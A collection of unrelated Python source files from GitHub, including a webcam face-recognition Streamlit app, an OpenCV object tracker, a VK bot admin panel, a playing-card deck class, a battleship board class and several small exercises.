    # Get Embeddings
    embs_gal = np.asarray([identity.embedding for identity in gallery])
    embs_det = np.asarray([identity.embedding for identity in subjects])
    # Calculate Cosine Distances (subjects x gallery matrix)
    cos_distances = cosine_distances(embs_det, embs_gal)
    # Find Matches
    matches = []
    for ident_idx, identity in enumerate(subjects):
        dists_to_identity = cos_distances[ident_idx]
        idx_min = np.argmin(dists_to_identity)
        if dists_to_identity[idx_min] < SIMILARITY_THRESHOLD:
            matches.append(Match(subject_id=identity, gallery_id=gallery[idx_min], distance=dists_to_identity[idx_min]))
    # Sort matches by the matched gallery identity's name for a stable
    # display order.  (The old comment said "by identity_idx", but the sort
    # key below is gallery_id.name.)
    matches = sorted(matches, key=lambda match: match.gallery_id.name)
    return matches
def draw_annotations(frame: np.ndarray, detections: List[Detection], matches: List[Match]) -> np.ndarray:
    """Render detections (blue boxes) and matches (green boxes + name banner).

    The frame is upscaled to 1920x1080 first; stored coordinates are in the
    source frame's pixel space, so every point is scaled by
    ``upscale_factor`` before drawing.  Returns the annotated 1080p RGB frame.
    """
    src_shape = np.asarray(frame.shape[:2][::-1])  # (width, height) before upscaling
    # Upscale frame to 1080p for better visualization of drawn annotations
    frame = cv2.resize(frame, (1920, 1080))
    upscale_factor = np.asarray([1920 / src_shape[0], 1080 / src_shape[1]])
    shape = np.asarray(frame.shape[:2][::-1])  # (1920, 1080) after upscaling
    # Make frame writeable (cv2.resize output already is; kept for safety)
    frame.flags.writeable = True

    def _pt(point):
        """Scale an (x, y) point into upscaled-frame integer pixel coords."""
        return tuple(int(v) for v in np.asarray(point, dtype=float) * upscale_factor)

    # Draw every raw detection in blue.
    for detection in detections:
        # Landmarks as small white dots
        for landmark in detection.landmarks:
            cv2.circle(frame, _pt(landmark), 2, (255, 255, 255), -1)
        # Bounding box
        cv2.rectangle(frame, _pt(detection.bbox[0]), _pt(detection.bbox[1]), (255, 0, 0), 2)
        # Detection index near the bottom-right corner.
        # Fix: the original passed cv2.LINE_AA where putText() expects the
        # font face; use a real font and pass LINE_AA as the line type.
        cv2.putText(
            frame,
            str(detection.idx),
            _pt((detection.bbox[1][0] + 2, detection.bbox[1][1] + 2)),
            cv2.FONT_HERSHEY_SIMPLEX,
            0.5,
            (0, 0, 0),
            2,
            cv2.LINE_AA,
        )

    # Overdraw matched subjects in green with a white name banner.
    for match in matches:
        detection = match.subject_id.detection
        name = match.gallery_id.name
        (x0, y0), (x1, _y1) = detection.bbox[0], detection.bbox[1]
        # Bounding box in green
        cv2.rectangle(frame, _pt((x0, y0)), _pt(detection.bbox[1]), (0, 255, 0), 2)
        # Banner: a filled white strip directly above the bounding box
        # (its height, shape[1] // 25, is in upscaled pixels).
        box_tl = _pt((x0, y0))
        banner_tl = (box_tl[0], box_tl[1] - shape[1] // 25)
        cv2.rectangle(frame, banner_tl, _pt((x1, y0)), (255, 255, 255), -1)
        # Name and distance inside the banner (text offsets are applied in
        # source-frame coordinates, matching the original layout).
        text_x = x0 + shape[0] // 400
        cv2.putText(
            frame,
            name,
            _pt((text_x, y0 - shape[1] // 50)),
            cv2.FONT_HERSHEY_SIMPLEX,
            0.7,
            (0, 0, 0),
            2,
            cv2.LINE_AA,
        )
        cv2.putText(
            frame,
            f" Distance: {match.distance:.2f}",
            _pt((text_x, y0 - shape[1] // 350)),
            cv2.FONT_HERSHEY_SIMPLEX,
            0.5,
            (0, 0, 0),
            2,
            cv2.LINE_AA,
        )
    return frame
def video_frame_callback(frame: av.VideoFrame) -> av.VideoFrame:
    """Per-frame WebRTC pipeline: detect -> recognize -> match -> annotate.

    Runs in the streamlit-webrtc worker for every incoming frame and reads
    the module-level ``gallery`` built from the uploaded images.
    """
    # Convert frame to numpy array (RGB)
    frame = frame.to_ndarray(format="rgb24")
    # Run face detection
    detections = detect_faces(frame)
    # Run face recognition (embeddings for each detection)
    subjects = recognize_faces(frame, detections)
    # Run face matching against the uploaded gallery
    matches = match_faces(subjects, gallery)
    # Draw annotations onto the (upscaled) frame
    frame = draw_annotations(frame, detections, matches)
    # Convert frame back to av.VideoFrame for the WebRTC stream
    frame = av.VideoFrame.from_ndarray(frame, format="rgb24")
    return frame
# ---------------------------------------------------------------------------------------------------------------------
# Streamlit app configuration
# Set page layout for streamlit to wide
st.set_page_config(layout="wide", page_title="Live Webcam Face Recognition", page_icon=":sunglasses:")
# Title
st.title("Live Webcam Face Recognition")
# Face gallery: upload one image per person; the filename stem becomes the
# identity's display name.
st.markdown("**Face Gallery**")
gal_container = st.container()
files = gal_container.file_uploader(
    "Upload images to gallery",
    type=["png", "jpg", "jpeg"],
    accept_multiple_files=True,
    label_visibility="collapsed",
)
# Process uploaded files and add to gallery.
# NOTE(review): this runs on every Streamlit rerun, re-embedding every
# uploaded image each time; consider caching (st.cache_data) if it gets slow.
gallery = []
for file in files:
    # Read file bytes
    file_bytes = np.asarray(bytearray(file.read()), dtype=np.uint8)
    # Decode image and convert from BGR to RGB
    img = cv2.cvtColor(cv2.imdecode(file_bytes, cv2.IMREAD_COLOR), cv2.COLOR_BGR2RGB)
    # Detect faces
    detections = detect_faces(img)
    if detections:
        # recognize faces
        subjects = recognize_faces(img, detections[:1])  # take only one face
        # Add subjects to gallery, named after the uploaded file
        gallery.append(
            Identity(name=os.path.splitext(file.name)[0], embedding=subjects[0].embedding, face=subjects[0].face)
        )
# Preview gallery images
gal_container.image(image=[identity.face for identity in gallery], caption=[identity.name for identity in gallery])
# Main window for stream
st.markdown("**Live Stream**")
# Start streaming component (video only, 1280px wide, via Twilio ICE servers)
with st.container():
    webrtc_streamer(
        key="LiveFaceRecognition",
        mode=WebRtcMode.SENDRECV,
        video_frame_callback=video_frame_callback,
        rtc_configuration={"iceServers": ICE_SERVERS},
        media_stream_constraints={"video": {"width": 1280}, "audio": False},
    )
# NOTE(review): leftover handler from a removed try/except -- delete or
# restore the surrounding try if webcam errors should be user-visible.
# except:
#     st.error("There is a problem with your webcam. Try a different Browser or device.")
| Martlgap/livefaceidapp | main.py | main.py | py | 11,160 | python | en | code | 19 | github-code | 50 |
22417525136 | # Libraries
########################################################################################################################
import numpy as np
import cv2 as cv
import matplotlib.pyplot as plt
########################################################################################################################
# Custom Functions
########################################################################################################################
# _Функция получение координат точки или обьекта по щелчку мыши
# (Function to get the coordinates of a point or object on a mouse click)
def TakeCoordinates(event, x_cord, y_cord, flags, param):
    """Mouse callback: on left click, remember the clicked pixel.

    Stores the click position in the module-level ``pixelCord`` and labels
    the point on the current annotated frame (``img2``).
    """
    if event == cv.EVENT_LBUTTONDOWN:
        pixelCord[0] = x_cord
        pixelCord[1] = y_cord
        # Fix: label the point that was actually clicked (x_cord, y_cord);
        # the original used the module globals x/y, which hold the tracker's
        # last position rather than the click.
        cv.putText(img2, "%d-%d" % (x_cord, y_cord), (x_cord + 10, y_cord - 10),
                   cv.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)
def Write_to_data_array(pixelCord):
    """Convert the given pixel to world coordinates and record it.

    The first ``injured_number`` points (x, y pairs) are appended to
    ``data_inf``; after that, up to two more points (four values) go into
    ``data_img`` as the corners of the capture rectangle used by AreaInit.
    NOTE(review): the parameter shadows the module-level ``pixelCord``.
    """
    x_cord, y_cord = ConvertationPixelINCoordinates(pixelCord[0], pixelCord[1])
    xy_coordinates[0] = x_cord
    xy_coordinates[1] = y_cord
    if len(data_inf) <= (injured_number * 2):
        data_inf.append(xy_coordinates[0])
        data_inf.append(xy_coordinates[1])
    else:
        if len(data_img) < 4:
            data_img.append(xy_coordinates[0])
            data_img.append(xy_coordinates[1])
# _Функция определения ориентации //Написать//
# (Object Orientation Function)
def Object_Orientation_Function():
    """Placeholder orientation estimator.

    Always reports an angle of 1; real orientation detection is still to be
    implemented.
    """
    return 1
# _Расчет центра квадрата, описывающего искомый обьект
# (Calculation of the center of the square describing the desired object)
def CalculationCenterSquare(number_1, number_2, samples=5):
    """Average accumulated centre-coordinate sums over *samples* observations.

    The main loop accumulates the box centre over 5 consecutive frames, so
    the divisor defaults to 5 for backward compatibility; pass *samples* to
    average over a different window size.  Returns the averaged (x, y) pair.
    """
    return number_1 / samples, number_2 / samples
# Преобразование пикселей в координаты
# (Converting income to coordinates)
def ConvertationPixelINCoordinates(x_conv, y_conv):
    """Convert a pixel position to world coordinates.

    Applies the fixed pixel-to-coordinate scale factor (1.57) to both axes
    and returns the scaled (x, y) pair.
    """
    scale = 1.57
    return x_conv * scale, y_conv * scale
# Выделение области захвата.
# (Selection of the capture area)
# Изображение ROI
def AreaInit(img_in, list_data):
    """Crop the user-selected rectangle from *img_in* and save it to disk.

    ``list_data`` holds two opposite corners [x1, y1, x2, y2] collected by
    Write_to_data_array; nothing happens until both corners are present.
    The crop is written to ``img_cut.jpg``.
    """
    if len(list_data) >= 4:
        x_1, y_1, x_2, y_2 = list_data[:4]
        # Normalise the corners so slicing works for any click order, and
        # coerce to int: the stored values are scaled world coordinates and
        # may be floats, which cannot be used as slice bounds.
        x_lo, x_hi = sorted((int(x_1), int(x_2)))
        y_lo, y_hi = sorted((int(y_1), int(y_2)))
        # Fix: NumPy images are indexed [row, column] == [y, x]; the original
        # sliced [x, y] and therefore cropped a transposed region.
        img_cut = img_in[y_lo:y_hi, x_lo:x_hi]
        plt.imsave("img_cut.jpg", img_cut)
########################################################################################################################
# __Переменные__(Variables)
# __Количество целевых точек__(Number of target points)
injured_number = int(input("Input number of injured "))
# __Списки данных__(Data Lists)
xy_coordinates = [0, 0]
data_cord = [0, 0]
data_inf = []
data_img = []
pixelCord = [0, 0]
# __
k_take_xy, x_sum, y_sum, w_sum, h_sum = 0, 0, 0, 0, 0
########################################################################################################################
# __Оновная программа__(Main)
# __ Часть первая. Чтение видео-потока.
cap = cv.VideoCapture(0)#("C:/Users/User_I/Desktop/Poliolimp/bandicam.mp4")
template = cv.imread('C:/Users/User_I/Desktop/Poliolimp/img2.png', 0)
w, h = template.shape[::-1]
methods = ['cv.TM_CCOEFF', 'cv.TM_CCOEFF_NORMED', 'cv.TM_CCORR',
'cv.TM_CCORR_NORMED', 'cv.TM_SQDIFF', 'cv.TM_SQDIFF_NORMED']
if not cap.isOpened():
print("Error video opened") # Ошибка открытия видео
exit()
##########################################################################################
while True:
    # Capture frame by frame
    ret, frame = cap.read()
    if not ret:
        print("Can't receive frame (stream end?). Exiting ...")
        break
    ##########################################################################################
    # Save the user-selected region of this frame (no-op until two corners
    # have been clicked).
    AreaInit(frame, data_img)
    ##########################################################################################
    # Disabled template-matching variant kept for reference:
    # for meth in methods:
    #     _, img = cap.read()
    #     method = eval(meth)
    #     # Apply template Matching
    #     img = cv.cvtColor(img, cv.COLOR_RGB2GRAY)
    #     res = cv.matchTemplate(img, template, method)
    #     min_val, max_val, min_loc, max_loc = cv.minMaxLoc(res)
    #     # If the method is TM_SQDIFF or TM_SQDIFF_NORMED, take minimum
    #     if method in [cv.TM_SQDIFF, cv.TM_SQDIFF_NORMED]:
    #         top_left = min_loc
    #     else:
    #         top_left = max_loc
    #     x, y = top_left[0], top_left[1]
    ######################################################################################
    # NOTE(review): the "image" window is only created inside the inner loop
    # (cv.namedWindow below), so this call can fail on the very first frame.
    cv.setMouseCallback("image", TakeCoordinates)
    x, y = pixelCord[0], pixelCord[1]
    w1, h1 = 60, 60  # 150, 150
    track_window = (x, y, w1, h1)
    # set up the ROI for tracking
    # NOTE(review): uses w/h from the match template, not w1/h1 -- confirm.
    roi = frame[y:y + h, x:x + w]
    hsv_roi = cv.cvtColor(roi, cv.COLOR_BGR2HSV)
    # Earlier HSV threshold candidates kept for reference:
    # mask = cv.inRange(hsv_roi, np.array((133., 0., 227.)), np.array((180., 255., 255.)))
    # mask = cv.inRange(hsv_roi, np.array((120., 110., 215.)), np.array((180., 255., 255.)))
    # 115 97 96 255 255 255
    mask = cv.inRange(hsv_roi, np.array((144., 0., 205.)), np.array((180., 153., 255.)))
    roi_hist = cv.calcHist([hsv_roi], [0], mask, [180], [0, 180])
    cv.normalize(roi_hist, roi_hist, 0, 255, cv.NORM_MINMAX)
    # Setup the termination criteria, either 10 iteration or move by at least 1 pt
    term_crit = (cv.TERM_CRITERIA_EPS | cv.TERM_CRITERIA_COUNT, 10, 1)
    while 1:
        ret, frame = cap.read()
        if ret:
            hsv = cv.cvtColor(frame, cv.COLOR_BGR2HSV)
            dst = cv.calcBackProject([hsv], [0], roi_hist, [0, 180], 1)
            # apply meanshift to get the new location
            ret, track_window = cv.meanShift(dst, track_window, term_crit)
            # Draw it on image
            # NOTE(review): this overwrites the template's w/h globals.
            x, y, w, h = track_window
            ##############################################################################################
            # Average the tracked box centre over 5 consecutive frames.
            if k_take_xy < 5:
                x_sum += x + w / 2
                y_sum += y + h / 2
                k_take_xy += 1
            else:
                data_cord[0], data_cord[1] = CalculationCenterSquare(x_sum, y_sum)
                k_take_xy, x_sum, y_sum = 0, 0, 0
            ###########################################################################################
            img2 = cv.rectangle(frame, (x, y), (x + w, y + h), 255, 2)
            ###########################################################################################
            img = cv.cvtColor(frame, cv.COLOR_RGB2GRAY)
            cv.namedWindow("image")
            cv.setMouseCallback("image", TakeCoordinates)
            ###########################################################################################
            ###########################################################################################
            # Keep the tracked object's pose (x, y, angle) appended after the
            # clicked target points in data_inf, then update it in place.
            # NOTE(review): right after the first append both conditions hold,
            # so the same slots are immediately rewritten -- harmless.
            if (injured_number * 2) == len(data_inf):
                data_inf.append(x)
                data_inf.append(y)
                data_inf.append(Object_Orientation_Function())
            if (injured_number * 2) < len(data_inf):
                data_inf[injured_number * 2] = x
                data_inf[injured_number * 2 + 1] = y
                data_inf[injured_number * 2 + 2] = Object_Orientation_Function()
            ###########################################################################################
            print("data_cord = ", data_cord)
            print("xy_coordinates = ", xy_coordinates)
            print("data_inf = ", data_inf)
            ############################################################################################################
            cv.imshow('image', img2)
            # ESC exits the tracking loop back to re-initialisation.
            k = cv.waitKey(30) & 0xff
            if k == 27:
                break
        else:
            break
# cv.putText(img2, "%d-%d" % (x, y), (x + 10, y - 10), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)
11609777638 | from database.methods.get import get_all_students, get_student_by_vk_id, get_students_with_admin
from vkbottle import Keyboard, KeyboardButtonColor, Text
from vkbottle.bot import Message, Blueprint
import logging
bp = Blueprint('admin_panel')  # blueprint for the admin-panel command
bp.on.vbml_ignore_case = True  # match command text case-insensitively
@bp.on.private_message(text=["админ", 'админка', 'flvby','admin',
                             "/админ", '/админка', '/flvby','/admin'])
@bp.on.private_message(payload={'cmd': 'admin_panel'})
async def admpanel(message: Message):
    """Show the admin panel: user/admin counts plus admin names.

    Triggered by the admin command text (with or without the leading "/")
    or the ``admin_panel`` keyboard payload; refuses non-admin users.
    """
    logging.info(f'{message.peer_id}: I get admin_panel')
    # The sender's VK user id
    user_id = message.from_id
    student = get_student_by_vk_id(user_id)
    # Admin check -- bail out with a (Russian) refusal message otherwise
    if not student.isAdmin:
        await message.answer('У тебя нет админских прав!')
        return
    # Build the panel keyboard: "all users" plus a red "back" button
    keyboard = (
        Keyboard()
        .add(Text('Все пользователи', {'cmd': 'all_users_0'}))
        .row()
        .add(Text('Назад', {'cmd': 'menu'}), color=KeyboardButtonColor.NEGATIVE)
    )
    admins = get_students_with_admin()  # all admin records from the DB
    admins_id = [admin.vk_id for admin in admins]  # their VK ids
    admins = await bp.api.users.get(admins_id)  # VK profile info for the admins
    admins = [f'{admin.first_name} {admin.last_name}' for admin in admins]  # "First Last" strings
    num_users = len(get_all_students())  # total registered users
    num_admins = len(admins)  # number of admins
    # NOTE(review): f-string interpolates the list's repr (brackets/quotes);
    # ", ".join(admins) would read better -- confirm before changing output.
    await message.answer(f"Число пользователей: {num_users} \nЧисло админов: {num_admins} \n Имена администраторов: {admins}", keyboard=keyboard)
# In a genealogical tree, every person except the founder has exactly one
# parent.  Each member of the tree is assigned a non-negative integer called
# its height: the founder's height is 0, and any other member's height is one
# more than its parent's height.
# Given a genealogical tree, determine the height of all of its members.
n = int(input())  # total number of people in the tree
d = {}  # maps a name to [other name] -- per the walk below, child -> parent
s = set()  # every name seen in the input
for _ in range(n - 1):
    # Each of the n-1 lines names two people; assumed "<child> <parent>",
    # which is what makes the parent walk below compute heights -- confirm.
    string = input().split()
    s.add(string[0])
    s.add(string[1])
    if string[0] in d:
        d[string[0]].append(string[1])
    else:
        d[string[0]] = [string[1]]
s = sorted(list(s))
# For each name, walk up the parent chain until the founder (who has no
# entry in d); the number of steps taken is the height.
# NOTE(review): O(n * depth) overall; memoizing heights would make it O(n).
for name in s:
    name_p = name
    lev = 0
    while name in d.keys():
        lev += 1
        name = d[name][0]
    print(name_p, lev)
| AnnaSmelova/Python_programming_basics_course | week7/24_genealogy.py | 24_genealogy.py | py | 1,042 | python | ru | code | 1 | github-code | 50 |
30614528108 | import os
import errno
import pandas as pd
import re
def mkdir_p(path):
    """Create *path* (and any missing parents) if it does not already exist.

    Equivalent to ``mkdir -p``: an already-existing directory is not an
    error, but an existing non-directory at *path* still raises, matching
    the previous errno-based check.
    """
    os.makedirs(path, exist_ok=True)
    return
def clean_sentence(sentence):
    """Get rid of trace characters.

    Removes every ``*``-prefixed trace token (e.g. ``*T*-1``) and every
    literal ``0`` character from *sentence*.
    """
    without_traces = re.sub(r'\*\S*', '', sentence)
    return without_traces.replace('0', '')
def format_context(dialogue):
    """Format a context dialogue for model input.

    Strips ``speaker<letter><1-3 digits>.`` tags and ``###`` separators,
    then removes trace characters via :func:`clean_sentence`.
    """
    without_speakers = re.sub(r'speaker[a-z][0-9][0-9]?[0-9]?\.', '', dialogue)
    without_separators = without_speakers.replace('###', '')
    return clean_sentence(without_separators)
def read_dataset_split_sentence_only(path_to_dataset):
    """Given a path to a TSV dataset, return (sentences, probability labels).

    Sentences come from the ``Question`` column; each label is the list
    ``[Every, A, The, Other]`` of determiner probabilities for that row.
    """
    df = pd.read_csv(path_to_dataset, sep='\t')
    sentences = df['Question'].tolist()
    label_rows = zip(df['Every'], df['A'], df['The'], df['Other'])
    labels = [list(row) for row in label_rows]
    return sentences, labels
def read_dataset_split_with_context(path_to_dataset, num_train_examples=None):
    """Given a path to a TSV dataset, return (dialogues, probability labels).

    Each dialogue is ``<PrecedingContext>[SEP]<Question>``; each label is the
    list ``[Every, A, The, Other]``.  When *num_train_examples* is given,
    only that many leading rows are used and the count is printed.
    """
    df = pd.read_csv(path_to_dataset, sep='\t')
    if num_train_examples is not None:
        df = df[:num_train_examples]
        print('num train examples', len(df))
    dialogues = [context + '[SEP]' + question
                 for context, question in zip(df['PrecedingContext'], df['Question'])]
    labels = [[every, a, the, other]
              for every, a, the, other in zip(df['Every'], df['A'], df['The'], df['Other'])]
    return dialogues, labels
17149404851 | import sys
sys.path.append("..")
from box_coder import DefaultBoxes, Encoder
import torch
def dboxes300_coco():
    """Build the SSD300 default (prior) boxes for COCO.

    Feature-map sizes, strides and anchor scales follow the reference
    configuration at
    https://github.com/amdegroot/ssd.pytorch/blob/master/data/config.py
    """
    image_size = 300
    feature_map_sizes = [38, 19, 10, 5, 3, 1]
    strides = [8, 16, 32, 64, 100, 300]
    anchor_scales = [21, 45, 99, 153, 207, 261, 315]
    aspect_ratios = [[2], [2, 3], [2, 3], [2, 3], [2], [2]]
    return DefaultBoxes(image_size, feature_map_sizes, strides, anchor_scales, aspect_ratios)
if __name__ == "__main__":
    # Manual regression check: decode the same saved network outputs with the
    # slow and the fast NMS paths and print their labels side by side.
    dboxes = dboxes300_coco()
    encoder = Encoder(dboxes, fast_nms=False)
    encoder_fast = Encoder(dboxes, fast_nms=True)
    # Pre-recorded inputs saved next to this script
    saved_inputs = torch.load('inputs.pth')
    bboxes = saved_inputs['bbox'].float()
    scores = saved_inputs['scores'].float()
    criteria = float(saved_inputs['criteria'])
    max_num = int(saved_inputs['max_output'])
    print('bboxes: {}, scores: {}'.format(bboxes.shape, scores.shape))
    # Decode one image at a time (batch of 1) through both encoders.
    for i in range(bboxes.shape[0]):
        box1, label1, score1 = encoder.decode_batch(bboxes[i, :, :].unsqueeze(0), scores[i, :, :].unsqueeze(0), criteria, max_num)[0]
        box2, label2, score2 = \
            encoder_fast.decode_batch(bboxes[i, :, :].unsqueeze(0), scores[i, :, :].unsqueeze(0), criteria, max_num)[0]
        # NOTE(review): only labels are printed; the decoded boxes and scores
        # are never compared.
        print('label: {}, fast label: {}'.format(label1, label2))
31168514697 | import random
import math
class Deck():
    """A standard 52-card deck, or a player's hand when ``deck_array`` is given.

    Cards are kept in two parallel, identically sorted lists:

    * ``deck_array``     -- face values such as ``'A♠'`` or ``'10♥'``
    * ``int_deck_array`` -- integer encodings in [0, 51]

    The encoding is ``13 * suit + rank`` with suits {♠: 0, ♥: 1, ♦: 2, ♣: 3}
    and ranks 2..10 -> 0..8, J -> 9, Q -> 10, K -> 11, A -> 12 (aces high).
    """

    def __init__(self, deck_array=None):
        """Create either a full 52-card deck or a hand.

        If ``deck_array`` is given it is treated as a player's hand and only
        those cards are kept; otherwise the complete deck is generated.
        Both representations are sorted by the integer encoding so that the
        same index refers to the same card in each.
        """
        self.heart = '♥'
        self.diamond = '♦'
        self.spade = '♠'
        self.club = '♣'
        # map number and suit to num value
        # Spade 1-13, Heart 1-13, Club 1-13, Diamond 1-13
        self.suit_array = ['Spade', 'Heart', 'Club', 'Diamond']
        self.char_suit_dict = {'♠': 0, '♥': 1, '♦': 2, '♣': 3}
        if deck_array:
            self.deck_array = deck_array
            self.int_deck_array = self.hand_cards_to_hand_numbers(self.deck_array)
            # sort the hand so both representations stay aligned
            self.deck_array.sort(key=self.map_card_to_number_value)
            self.int_deck_array.sort()
            return
        self.deck_array = list()
        # build the full deck: every rank (1=A .. 13=K) in every suit
        for x in range(1, 14):
            val = str(x)
            if x == 1:
                val = 'A'
            if x == 11:
                val = 'J'
            if x == 12:
                val = 'Q'
            if x == 13:
                val = 'K'
            self.deck_array.append(val + self.heart)
            self.deck_array.append(val + self.diamond)
            self.deck_array.append(val + self.spade)
            self.deck_array.append(val + self.club)
        self.int_deck_array = self.hand_cards_to_hand_numbers(self.deck_array)
        # sort the decks (deck_array by encoding so indices line up)
        self.deck_array.sort(key=self.map_card_to_number_value)
        self.int_deck_array.sort()

    def shuffle_deck(self):
        """Randomize the deck order, keeping both representations aligned.

        Fix: previously only ``deck_array`` was shuffled, which silently
        broke the index correspondence with ``int_deck_array`` that
        :meth:`remove_card` relies on.
        """
        random.shuffle(self.deck_array)
        self.int_deck_array = self.hand_cards_to_hand_numbers(self.deck_array)

    def hand_cards_to_hand_numbers(self, hand):
        """Map every face value in *hand* to its integer encoding."""
        return [self.map_card_to_number_value(card) for card in hand]

    def map_card_to_number_value(self, value):
        """Map a face value like ``'Q♦'`` to its integer encoding.

        Aces are high: within a suit, 2..10 map to 0..8, then J, Q, K and
        finally A at 12.
        """
        # a length-3 card can only be a 10 (two-digit rank + suit char)
        if len(value) == 3:
            suit_val = self.char_suit_dict.get(value[2]) * 13
            suit_val += 8
        else:
            suit_val = self.char_suit_dict.get(value[1]) * 13
            if value[0] == 'A':
                suit_val += 12
            elif value[0] == 'J':
                suit_val += 9
            elif value[0] == 'Q':
                suit_val += 10
            elif value[0] == 'K':
                suit_val += 11
            else:
                suit_val += (int(value[0]) - 2)
        return suit_val

    def get_key_from_val(self, val, dicter):
        """Reverse lookup helper: first key in *dicter* mapped to *val*."""
        for key in dicter.keys():
            if dicter[key] == val:
                return key

    def hand_numbers_to_hand_cards(self, int_hand):
        """Map every integer encoding in *int_hand* back to its face value."""
        return [self.map_card_to_hand(card) for card in int_hand]

    def map_card_to_hand(self, value):
        """Map an integer encoding in [0, 51] back to its face value.

        Fix: this is now the exact inverse of :meth:`map_card_to_number_value`.
        The previous implementation decoded a different rank scheme (A from 1,
        K from 0), so encode -> decode round-trips produced the wrong card.
        """
        suit = self.get_key_from_val(value // 13, self.char_suit_dict)
        rank = value % 13
        if rank == 12:
            card = 'A'
        elif rank == 9:
            card = 'J'
        elif rank == 10:
            card = 'Q'
        elif rank == 11:
            card = 'K'
        else:
            card = str(rank + 2)
        return card + suit

    def remove_card(self, index):
        """Remove the card at *index* from both parallel representations.

        Used after a player plays a card; not part of normal dealing.
        """
        self.deck_array.pop(index)
        self.int_deck_array.pop(index)

    def convert_external_card_to_int(self, card):
        """Public wrapper: encode an externally supplied face value."""
        return self.map_card_to_number_value(card)
70485352157 | from ship import Ship
from square import Square
class Ocean():
    """A player's 10x10 battleship board and the ships placed on it."""

    width = 10
    height = 10

    def __init__(self, owner):
        """Create an empty board belonging to *owner* (a player name)."""
        self.board = []
        self.ships = []
        self.owner = owner
        # board[y][x] holds the Square at column x, row y
        for y in range(self.height):
            row = []
            for x in range(self.width):
                row.append(Square(x, y, Square.SQUARE_STATES['empty']))
            self.board.append(row)

    def get_ships(self):
        """Return the list of ships placed on this board."""
        return self.ships

    def get_board(self):
        """Return the 2-D list of Squares."""
        return self.board

    def is_ship_on_board(self, ship):
        '''Return True if ship will fit on board, else False'''
        for x, y in ship.get_territory():
            if x not in range(self.width) or y not in range(self.height):
                return False
        return True

    def is_ship_location_valid(self, ship):
        '''Return True if ship will not overlap or touch other ships, else False'''
        for x, y in ship.get_region():
            # Fix: only inspect squares that really exist.  The previous
            # try/except IndexError let negative coordinates wrap around to
            # the opposite edge of the board (Python negative indexing), so a
            # ship on one border could be blocked by a ship on the other.
            if 0 <= x < self.width and 0 <= y < self.height:
                if self.board[y][x].get_status() == Square.SQUARE_STATES['ship']:
                    return False
        return True

    def add_ship(self, x, y, is_horizontal, ship_type):
        ''' Tries to add ship to board. Returns True if ship has been added to board, else False'''
        ship = Ship(x, y, is_horizontal, ship_type)
        if not (self.is_ship_on_board(ship) and self.is_ship_location_valid(ship)):
            return False
        # Placement is legal: mark every territory square and register the ship.
        for sx, sy in ship.get_territory():
            self.board[sy][sx].set_status('ship')
        self.ships.append(ship)
        return True

    def print_ocean(self, player):
        '''If player is the owner of the ocean prints board with all ships,
        else board with only hit squares of ships'''
        coordinates = (' ', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J')
        print("This board belongs to: " + self.owner + "\n")
        print("  ".join(coordinates))
        print("--------------------------------------------")
        for y in range(self.height):
            print(str(y + 1).rjust(2) + " | ", end="")
            for x in range(self.width):
                square = self.board[y][x]
                # Opponents only see hit squares: intact ship squares are
                # rendered as blank.
                if player != self.owner and square.get_status() == Square.SQUARE_STATES['ship']:
                    print(" ", end=" | ")
                else:
                    print(square, end=" | ")
            print("\n" + "--------------------------------------------")
| SebastianHalinski/Battleship | ocean.py | ocean.py | py | 2,748 | python | en | code | 0 | github-code | 50 |
class Solution:
    def maxArea(self, height):
        """
        :type height: List[int]
        :rtype: int

        Container-with-most-water via the standard two-pointer sweep: keep a
        pointer at each end; the contained area is limited by the shorter
        line, so moving the taller pointer inward can never increase it --
        always advance the shorter one.  This replaces the previous
        sort-based O(n log n) approach with a single O(n) pass using O(1)
        extra space (the old version also built per-height index lists).
        """
        best = 0
        left, right = 0, len(height) - 1
        while left < right:
            # Area bounded by the two current lines.
            area = min(height[left], height[right]) * (right - left)
            if area > best:
                best = area
            # Move the pointer at the shorter line inward.
            if height[left] < height[right]:
                left += 1
            else:
                right -= 1
        return best
if __name__ == "__main__":
    # Quick manual check against the large input (heights 0..9999).
    # The unused sample list that was here has been removed.
    s = Solution()
    print(s.maxArea(range(10000)))
| NikolaiT/incolumitas | content/Interview/src/water6.py | water6.py | py | 1,435 | python | en | code | 17 | github-code | 50 |
7014122383 | #Jonathan Dang | PP2.16 | Assignment 1
#I Jonathan Dang do hereby certify that I have derived no assistance for this project or examination from any sources whatever, whether oral, written, or in print
#except with explicit discretion from the source material itself.
#PP2.16 Write a program that reads a five-digit positive integer and breaks it into a sequence of individual digits. For example, the input 16384 is displayed as
# 1 6 3 8 4
#INPUT: 5 digit number
#OUTPUT: 5 numbers printed, space seperated
# Keep prompting until the user supplies a valid 5-digit number (10000-99999).
while True:
    userInput = input("Please enter a 5 digit number[10000 -> 99999]: ").strip()
    # Also reject non-numeric strings and numbers below 10000 (leading zero),
    # not just inputs of the wrong length.
    if len(userInput) == 5 and userInput.isdigit() and userInput[0] != "0":
        break
    print("Invalid input")
# Print the digits space-separated, e.g. 16384 -> "1 6 3 8 4".
print(" ".join(userInput))
'''
Please enter a 5 digit number[10000 -> 99999]: 16384
1 6 3 8 4
''' | Jonathan-Dang/CS3C | Assignment1/PP2-16.py | PP2-16.py | py | 959 | python | en | code | 0 | github-code | 50 |
38682123289 | import sys
from pathlib import Path
from timeit import default_timer as timer
from . import http
SCRIPT_PATH = Path(sys.argv[0])  # path of the puzzle script being executed
SCRIPT_DIR = SCRIPT_PATH.parent  # expected layout: <root>/<year>/<day>/script.py
ROOT_DIR = SCRIPT_DIR.parent.parent  # repository root (holds _session.txt)
PUZZLE_DAY = SCRIPT_DIR.name  # the day directory's name doubles as the puzzle day
PUZZLE_YEAR = SCRIPT_DIR.parent.name  # the parent directory's name doubles as the year
CHALLENGE_COUNT = 0  # number of challenges executed so far (updated by run())
TOTAL_TIME = 0  # accumulated challenge runtime in milliseconds (updated by run())
def get_input(delim='\n', data_type=str):
    """Read this puzzle's input.txt, split it on *delim*, and convert every
    non-empty chunk with *data_type* (downloads the input first if missing)."""
    test_input()
    with Path(SCRIPT_DIR, 'input.txt').open('r') as handle:
        raw = handle.read()
    return [data_type(chunk) for chunk in raw.split(delim) if chunk]
def get_example(delim='\n', data_type=str):
    """Like get_input(), but reads the hand-copied example.txt instead."""
    test_input()
    with Path(SCRIPT_DIR, 'example.txt').open('r') as handle:
        raw = handle.read()
    return [data_type(chunk) for chunk in raw.split(delim) if chunk]
def run(callback, *args, **kwargs):
